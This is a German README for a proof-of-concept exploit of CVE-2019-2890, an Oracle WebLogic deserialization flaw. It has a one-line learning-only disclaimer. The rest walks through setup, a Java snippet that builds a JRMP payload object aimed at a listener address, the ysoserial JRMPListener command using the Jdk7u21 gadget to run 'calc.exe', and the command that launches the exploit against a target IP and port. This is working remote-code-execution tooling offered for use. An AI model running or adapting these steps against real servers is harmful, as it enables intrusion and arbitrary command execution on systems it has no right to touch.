
PoC-Exploit für CVE-2019-2890, das auf Oracle WebLogic abzielt, unter Verwendung von ysoserial JRMP Payload für die Remote-Befehlsausführung über die Deserialisierung serialisierter Objekte.
Nur für Lern- und Austauschzwecke. Für andere Verwendungen übernehmen wir keine Haftung.
Die relevanten JAR-Dateien wurden bereits in das Projekt importiert, und die Nutzungsmethode verwendet yso's JRMP. Beim Lernen und Debuggen kann die Nutzungsmethode geändert werden.
Zunächst muss die Datei SerializedSystemIni.dat aus dem weblogic-Verzeichnis in den Ordner security gelegt werden.
Dann muss yso in ysoserial.jar umbenannt und in das lib-Verzeichnis importiert werden.

Zweitens die IP-Adresse und der Port von getObject in weblogic/wsee/jaxws/persistence/PersistentContext.java.
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
Schließlich wird der JRMP-Listener aus der Ferne gestartet und die 7u21-Befehlsausführung genutzt.
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
Verwendung: Führen Sie Poc.java aus, um die serialisierte Datei poc.ser zu generieren, und verwenden Sie dann
python weblogic.py ip port poc.ser

